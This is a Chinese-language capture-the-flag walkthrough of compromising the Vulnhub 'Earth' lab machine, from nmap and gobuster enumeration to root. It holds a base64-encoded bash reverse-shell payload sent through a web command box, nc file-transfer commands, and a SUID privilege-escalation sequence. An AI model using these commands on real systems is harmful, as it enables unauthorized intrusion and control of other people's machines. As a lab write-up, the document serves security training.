Earth 靶机笔记
概述
这是一台 Vulnhub 的靶机,主要是
Earth 靶机地址:The Planets: Earth ~ VulnHub
一、nmap 扫描
1、端口扫描
-sT 以 TCP 全连接扫描,--min-rate 10000 以最低 10000 速率进行扫描,-p-进行全端口扫描,-o ports 结果输出到 ports 文件中
sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.52.4 |
Nmap scan report for 192.168.52.4 | |
Host is up (0.00042s latency). | |
Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach) | |
PORT STATE SERVICE | |
22/tcp open ssh | |
80/tcp open http | |
443/tcp open https | |
MAC Address: 00:0C:29:5D:22:84 (VMware) | |
# Nmap done at Fri Nov 22 15:32:16 2024 -- 1 IP address (1 host up) scanned in 13.43 seconds |
2、详细信息扫描
以-sT 以 tcp, -sV 探测版本, -sC 以默认脚本 扫描端口 $ports,-O 探测操作系统版本,输出到 details 文件中
sudo nmap -sT -sV -sC -p22,80,443 -O -o nmapscan/details 192.168.52.4 |
结果:
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.6 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA) | |
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519) | |
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9) | |
|_http-title: Bad Request (400) | |
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9 | |
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9) | |
|_ssl-date: TLS randomness does not represent time | |
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9 | |
| http-methods: | |
|_ Potentially risky methods: TRACE | |
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space | |
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local | |
| Not valid before: 2021-10-12T23:26:31 | |
|_Not valid after: 2031-10-10T23:26:31 | |
|_http-title: Test Page for the HTTP Server on Fedora | |
| tls-alpn: | |
|_ http/1.1 | |
MAC Address: 00:0C:29:5D:22:84 (VMware) | |
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port | |
Device type: general purpose | |
Running: Linux 5.X | |
OS CPE: cpe:/o:linux:linux_kernel:5.4 | |
OS details: Linux 5.4 | |
Network Distance: 1 hop | |
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
# Nmap done at Fri Nov 22 15:33:47 2024 -- 1 IP address (1 host up) scanned in 20.41 seconds |
看到目标的两个域名信息 earth.local
,terratest.earth.local
我们将他写到 /etc/hosts
文件中
3、默认脚本扫描
nmap --script=vuln -p22,80,443 -o nmapscan/vuln 192.168.52.4 |
PORT STATE SERVICE | |
22/tcp open ssh | |
80/tcp open http | |
|_http-dombased-xss: Couldn't find any DOM based XSS. | |
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | |
|_http-trace: TRACE is enabled | |
|_http-csrf: Couldn't find any CSRF vulnerabilities. | |
| http-enum: | |
|_ /icons/: Potentially interesting folder w/ directory listing | |
443/tcp open https | |
|_http-trace: TRACE is enabled | |
|_http-dombased-xss: Couldn't find any DOM based XSS. | |
|_http-csrf: Couldn't find any CSRF vulnerabilities. | |
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | |
| http-enum: | |
|_ /icons/: Potentially interesting folder w/ directory listing | |
MAC Address: 00:0C:29:5D:22:84 (VMware) | |
# Nmap done at Fri Nov 22 15:34:49 2024 -- 1 IP address (1 host up) scanned in 42.87 seconds |
二、web 渗透
看到目标开放了 80 和 443 端口,我们打开看看
80 端口
443 端口
是一个 webserver 的默认页面
我们还有两个域名同时也看一下,发现两个域名所透露出来的信息是一样的
看样子是一个消息反馈的页面,而下面有 Previous Messages 也就是 曾经的消息 看样子是加密了,而解密出来很可能是我们感兴趣的内容。
走到这里我们可以进行目录爆破了,从而充分扩大我们的攻击面
sudo gobuster dir -u http://192.168.52.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt |
sudo gobuster dir -u https://192.168.52.4:443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k |
sudo gobuster dir -u https://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k |
sudo gobuster dir -u https://terratest.earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k |
同时还可以加参数 -x zip,tar,txt
等后缀,扩大字典再次进行第二次扫描
通过目录爆破我们发现了 https://earth.local
下面有一个 /admin
的页面
是一个登陆页面
我们所知道的信息也就这些,当然我们在后边尝试几个可能的路径,像是:/robots.txt
这类的目录
在 terratest.earth.local
域名下发现了一个 /testingnotes.*
,尝试 fuzz 一下,发现是 /testingnotes.txt
发现了一段话
关键的信息有:
采用 XOR,也就是异或加密
testdata.txt 内容是加密的密钥
terra 是用户名
查看 testdata.txt 内容
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago. |
我们来到 CyberChef 解密内容
解密成功 earthclimatechangebad4humans
的重复字符串
这个应该就是密码,尝试在 admin 页面登陆
登录成功看到是一个命令执行的框
三、获得立足点
构造反弹 shell payload
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjMvNDQ0NCAwPiYxJwo= | base64 -d | bash | |
在网页执行这个
kali 端开启监听
sudo rlwrap -cAr nc -lvnp 4444 |
成功获得了初始的 shell
在 /var/earth_web
翻找到了 user 的 flag
四、提权到 root
find / -perm -4000 -type f 2> /dev/null |
有一个 reset_root
文件,令我们很感兴趣,执行看看
看来执行失败了
利用 nc 传输到 kali 本地进行分析
kali 执行
nc -lvp 4444 > reset_root |
靶机执行
cat /usr/bin/reset_root | nc 192.168.52.3 4444 |
看到传输完成
chmod +x reset_root |
利用 file 查看文件属性
file reset_root |
看到就是 linux 的可执行文件
利用 ltrace 看看它的函数调用
ltrace ./reset_root |
看到有几个文件是不存在的
程序尝试访问
/dev/shm/kHgTFI5G
、/dev/shm/Zw7bV9U5
和/tmp/kcM0Wewe
这些文件,但访问失败(返回值为-1)
在靶机上创建这些文件
touch /dev/shm/kHgTFI5G | |
touch /dev/shm/Zw7bV9U5 | |
touch /tmp/kcM0Wewe |
再次执行
reset_root |
看到 root 密码已经被我们重置为了 Earth
成功获得了 root 权限
找到了 root_flag
来一张照吧
[root@earth ~]# whoami | |
whoami | |
root | |
[root@earth ~]# uname -a | |
uname -a | |
Linux earth 5.14.9-200.fc34.x86_64 #1 SMP Thu Sep 30 11:55:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux | |
[root@earth ~]# ip a | |
ip a | |
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 | |
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 | |
inet 127.0.0.1/8 scope host lo | |
valid_lft forever preferred_lft forever | |
inet6 ::1/128 scope host | |
valid_lft forever preferred_lft forever | |
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 | |
link/ether 00:0c:29:5d:22:84 brd ff:ff:ff:ff:ff:ff | |
altname enp2s1 | |
inet 192.168.52.4/24 brd 192.168.52.255 scope global dynamic noprefixroute ens33 | |
valid_lft 1730sec preferred_lft 1730sec | |
inet6 fe80::f2c5:57e:d7af:5f01/64 scope link noprefixroute | |
valid_lft forever preferred_lft forever | |
[root@earth ~]# cat /var/earth_web/user_flag.txt | |
cat /var/earth_web/user_flag.txt | |
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d] | |
[root@earth ~]# cat root_flag.txt | |
cat root_flag.txt | |
_-o#&&*''''?d:>b\_ | |
_o/"`'' '',, dMF9MMMMMHo_ | |
.o&#' `"MbHMMMMMMMMMMMHo. | |
.o"" ' vodM*$&&HMMMMMMMMMM?. | |
,' $M&ood,~'`(&##MMMMMMH\ | |
/ ,MMMMMMM#b?#bobMMMMHMMML | |
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk | |
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L | |
| |MMMMMMMMMMMMMMMMMMMMbMH' T, | |
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `? | |
]MMH# ""*""""*#MMMMMMMMMMMMM' - | |
MMMMMb_ |MMMMMMMMMMMP' : | |
HMMMMMMMHo `MMMMMMMMMT . | |
?MMMMMMMMP 9MMMMMMMM} - | |
-?MMMMMMM |MMMMMMMMM?,d- ' | |
:|MMMMMM- `MMMMMMMT .M|. : | |
.9MMM[ &MMMMM*' `' . | |
:9MMk `MMM#" - | |
&M} ` .- | |
`&. . | |
`~, . ./ | |
. _ .- | |
'`--._,dd###pp=""' | |
Congratulations on completing Earth! | |
If you have any feedback please contact me at SirFlash@protonmail.com | |
[root_flag_b0da9554d29db2117b02aa8b66ec492e] |
这台靶机就被我们拿下了
最后